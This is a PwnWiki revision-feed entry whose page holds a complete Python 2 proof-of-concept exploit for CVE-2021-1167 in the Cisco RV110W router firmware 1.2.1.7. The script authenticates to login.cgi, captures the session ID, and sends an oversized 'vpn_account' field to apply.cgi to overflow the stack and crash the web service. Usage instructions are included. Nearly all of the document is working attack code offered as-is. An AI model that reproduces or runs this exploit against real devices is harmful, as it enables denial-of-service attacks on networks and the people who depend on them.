https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-1167_Cisco_RV110W_1.2.1.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E CVE-2021-1167 Cisco RV110W 1.2.1.7 拒絕服務漏洞 - Revision history 2026-04-20T12:51:11Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-1167_Cisco_RV110W_1.2.1.7_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&diff=3771&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) # Date: 2021-01 # Exploit Author: Shizhi He # Vendor Homepage: https://www.cisco.co..." 2021-05-31T04:10:07Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Cisco RV110W 1.2.1.7 - &#039;vpn_account&#039; Denial of Service (PoC) # Date: 2021-01 # Exploit Author: Shizhi He # Vendor Homepage: https://www.cisco.co...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)<br /> # Date: 2021-01<br /> # Exploit Author: Shizhi He<br /> # Vendor Homepage: https://www.cisco.com/<br /> # Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7<br /> # Version: V1.2.1.7<br /> # Tested on: RV110W V1.2.1.7<br /> # CVE : CVE-2021-1167<br /> # References: <br /> # https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md <br /> # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U<br /> <br /> #!/usr/bin/env python2<br /> <br /> #####<br /> ## Cisco RV110W Remote Stack Overflow.<br /> ### Tested on version: V1.2.1.7 (maybe useable on other products and versions)<br /> <br /> <br /> import os<br /> import sys<br /> import re<br /> import urllib<br /> import urllib2<br /> import getopt<br /> import json<br /> import hashlib<br /> import ssl<br /> <br /> ssl._create_default_https_context = ssl._create_unverified_context<br /> <br /> ###<br /> # Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco<br /> # This PoC will crash the target HTTP/HTTPS service<br /> ###<br /> <br /> #encrypt password<br /> def enc(s):<br /> l = len(s)<br /> s += &quot;%02d&quot; % l<br /> mod = l + 2<br /> ans = &quot;&quot;<br /> for i in range(64):<br /> tmp = i % mod<br /> ans += s[tmp]<br /> return hashlib.md5(ans).hexdigest()<br /> <br /> if __name__ == &quot;__main__&quot;:<br /> print &quot;Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco&quot;<br /> <br /> IP = sys.argv[1]<br /> PORT = sys.argv[2]<br /> USERNAME = sys.argv[3]<br /> PASSWORD = enc(sys.argv[4]) <br /> url = 'https://' + IP + ':' + PORT + '/' <br /> <br /> #get session_id by POST login.cgi<br /> req = urllib2.Request(url + &quot;login.cgi&quot;)<br /> req.add_header('Origin', url)<br /> req.add_header('Upgrade-Insecure-Requests', 1)<br /> req.add_header('Content-Type', 'application/x-www-form-urlencoded')<br /> req.add_header('User-Agent',<br /> 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')<br /> req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')<br /> req.add_header('Referer', url)<br /> req.add_header('Accept-Encoding', 'gzip, deflate')<br /> req.add_header('Accept-Language', 'en-US,en;q=0.9')<br /> req.add_header('Cookie', 'SessionID=')<br /> data = {&quot;submit_button&quot;: &quot;login&quot;,<br /> &quot;submit_type&quot;: &quot;&quot;,<br /> &quot;gui_action&quot;: &quot;&quot;,<br /> &quot;wait_time&quot;: &quot;0&quot;,<br /> &quot;change_action&quot;: &quot;&quot;,<br /> &quot;enc&quot;: &quot;1&quot;,<br /> &quot;user&quot;: USERNAME,<br /> &quot;pwd&quot;: PASSWORD,<br /> &quot;sel_lang&quot;: &quot;EN&quot;<br /> }<br /> r = urllib2.urlopen(req, urllib.urlencode(data))<br /> resp = r.read()<br /> login_st = re.search(r'.*login_st=\d;', resp).group().split(&quot;=&quot;)[1]<br /> session_id = re.search(r'.*session_id.*\&quot;;', resp).group().split(&quot;\&quot;&quot;)[1]<br /> print session_id<br /> <br /> #trigger stack overflow through POST vpn_account parameter and cause denial of service<br /> req2 = urllib2.Request(url + &quot;apply.cgi;session_id=&quot; + session_id)<br /> req2.add_header('Origin', url)<br /> req2.add_header('Upgrade-Insecure-Requests', 1)<br /> req2.add_header('Content-Type', 'application/x-www-form-urlencoded')<br /> req2.add_header('User-Agent',<br /> 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')<br /> req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')<br /> req2.add_header('Referer', url)<br /> req2.add_header('Accept-Encoding', 'gzip, deflate')<br /> req2.add_header('Accept-Language', 'en-US,en;q=0.9')<br /> req2.add_header('Cookie', 'SessionID=')<br /> poc = &quot;a&quot; * 4096<br /> data_cmd = {<br /> &quot;gui_action&quot;: &quot;Apply&quot;,<br /> &quot;submit_type&quot;: &quot;&quot;,<br /> &quot;submit_button&quot;: &quot;vpn_client&quot;,<br /> &quot;change_action&quot;: &quot;&quot;,<br /> &quot;pptpd_enable&quot;: &quot;0&quot;,<br /> &quot;pptpd_localip&quot;: &quot;10.0.0.1&quot;,<br /> &quot;pptpd_remoteip&quot;: &quot;10.0.0.10-14&quot;,<br /> &quot;pptpd_account&quot;: &quot;&quot;,<br /> &quot;vpn_pptpd_account&quot;: &quot;1&quot;,<br /> &quot;vpn_account&quot;: poc,<br /> &quot;change_lan_ip&quot;: &quot;0&quot;,<br /> &quot;netbios_enable&quot;: &quot;0&quot;,<br /> &quot;mppe_disable&quot;: &quot;0&quot;,<br /> &quot;importvpnclient&quot;: &quot;&quot;,<br /> &quot;browser&quot;: &quot;&quot;,<br /> &quot;webpage_end&quot;: &quot;1&quot;,<br /> }<br /> r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))<br /> resp = r.read()<br /> print resp<br /> &lt;/pre&gt;</div> Pwnwiki